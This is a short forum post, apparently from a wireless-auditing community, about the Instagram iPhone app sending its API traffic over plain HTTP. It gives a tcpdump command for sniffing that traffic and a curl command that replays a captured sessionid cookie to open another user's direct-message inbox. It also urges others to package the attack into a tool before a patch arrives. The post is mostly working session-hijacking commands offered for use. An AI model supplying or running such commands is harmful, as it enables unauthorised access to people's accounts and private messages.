As many already know, Instagram on iphones transmit its API over HTTP leaving session hijacking as an easy win. This is super simple to execute without a GUI but someone may want to create an infusion for this or include into trapcookie until it gets patched.
tcpdump -In -i en0 -s 2048 -A dst i.instagram.com
curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \ -H 'Cookie: sessionid=CDSDFWE!242312' \ https://i.instagram.com/api/v1/direct_share/inbox/`
More details can be found here
https://gist.github.com/stevegraham/9a98627eebd6b09d4483
